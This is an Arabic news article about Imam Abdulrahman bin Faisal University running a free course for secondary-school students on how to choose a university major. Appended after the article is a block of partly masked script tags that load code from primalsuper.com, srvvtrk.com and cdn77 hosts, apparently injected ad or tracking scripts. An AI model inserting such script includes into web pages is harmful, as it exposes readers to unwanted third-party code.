شكرا لقرائتكم خبر عن جامعة الإمام عبدالرحمن تعقد دورة لطلاب الثانوية والان نبدء بالتفاصيل

تعتزم عمادة القبول والتسجيل بجامعة الإمام عبدالرحمن بن فيصل عقد دورة موجهة لطلبة المرحلة الثانوية، يقدمها المدرب والمستشار للتطوير المهني د. ياسر بكار، بعنوان «كيف تختار تخصصك الجامعي؟» وتتضمن عدة محاور، من بينها: التعرف على المبادئ الأساسية لاختيار التخصص، إضافة إلى الميول والقدرات الشخصية، إلى جانب التعريف بأهم التخصصات الجامعية والفرق بينها.

وأوضح عميد القبول والتسجيل د. صالح الراشد، أن اللقاء يأتي ضمن أنشطة مشروع «أفق» التنموي لاختيار التخصص الجامعي، وهو أحد مبادرات المسؤولية المجتمعية للعمادة التي حظيت بالتعاون مع إدارة التعليم بالمنطقة الشرقية، وتم تفعيلها من خلال عدة مراحل، تتضمن زيارات ولقاءات مع طلبة المرحلة الثانوية، وتهدف إلى التعريف بجامعة الإمام عبدالرحمن بن فيصل وبرامجها وشروط القبول فيها، كما تسلط الضوء على أسس اختيار الطالب لتخصصه بناء على قاعدة «الرغبة والقدرة والفرصة».

وذكر د. الراشد أن العمادة حرصت على إقامة اللقاء لتمكين خريج المرحلة الثانوية العامة من معرفة ميوله والتخصصات التي تتناسب مع قدراته الشخصية قبل دخوله الجامعة، وكذلك معرفة المسارات والكليات والتخصصات المتاحة بالجامعة، وتم إتاحة التسجيل من خلال موقع الجامعة لحضور اللقاء ونشر رابط التسجيل لمرشدي الطلاب ومرشدات الطالبات في مختلف مدارس الثانوية بالمنطقة الشرقية، بالتنسيق مع إدارة التعليم، وكذلك عبر مواقع التواصل الاجتماعي، وتقدم من خلال الرابط أكثر من 1000 طالب و2500 طالبة لحضور اللقاء، وخصص يوم السبت للطالبات، والأحد للطلاب، في مبنى قاعة المؤتمرات بالحرم الجامعي.

وتعد جامعة الإمام عبدالرحمن بن فيصل من أولى الجامعات على مستوى المنطقة الشرقية التي تعقد دورات مجانية توضح آلية القبول بالجامعة واختيار التخصص.. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_916221443&key=1fd3b038f796d0b159&cv=1549460239&t=1549460238708" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_38009826&key=1fd3b038f796d0b159&cv=9834&t=1549460238708" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460238713" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********